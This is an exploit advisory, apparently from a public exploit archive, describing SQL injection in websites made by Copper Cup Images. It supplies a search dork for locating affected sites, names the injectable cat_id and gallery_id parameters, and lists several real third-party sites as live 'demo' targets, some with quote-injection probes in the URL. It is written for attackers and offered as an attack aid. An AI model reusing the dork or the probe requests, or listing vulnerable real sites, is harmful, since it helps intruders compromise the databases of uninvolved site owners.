# Exploit Title: Copper Cup Images SQLi # dork : intext:"Site by Copper Cup Images" inurl:cat_id= or inurl:gallery_id= # Exploit Author: Arm_Legi (Anonplus) # Website: http://anonplus.tk/ # Date: 27 May 2018 # Vendor : https://www.tourismus-marketing-bayerischer-wald.de/internet.html and https://www.putzwerbung.de/webdesign.html # Version : Last Version # CVE: N/A Technical Details & Description: ===================================================================================================================== A remote sql-injection web vulnerability has been discovered in a web app of https://www.coppercupimages.com/ The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms. ===================================================================================================================== Request Method(s): [+] GET Vulnerable File(s): [+] There is different file that use same parameter and all vulnerable Vulnerable Parameter(s): [+] cat_id= [+] gallery_id= [+] other ===================================================================================================================== Demo: http://www.questionpursuit.com/take-a-quiz_id22.php?step=1&cat_id=10 <-----(cat_id is vuln) https://www.visitbartlesville.com/frank-lloyd-wrights-price-tower_id58.php?action=view%27&place_id=50&cat_id=4<-----(cat_id is vuln) https://www.noark.org/galleries_id54?gallery_id=34 <------(gallery_id vuln) view-source:http://www.warnersound.com/portfolio_id51.php?gallery_id=2%27 <---- as you can see , you can only see the sql errors in the source of the web page! but is vuln!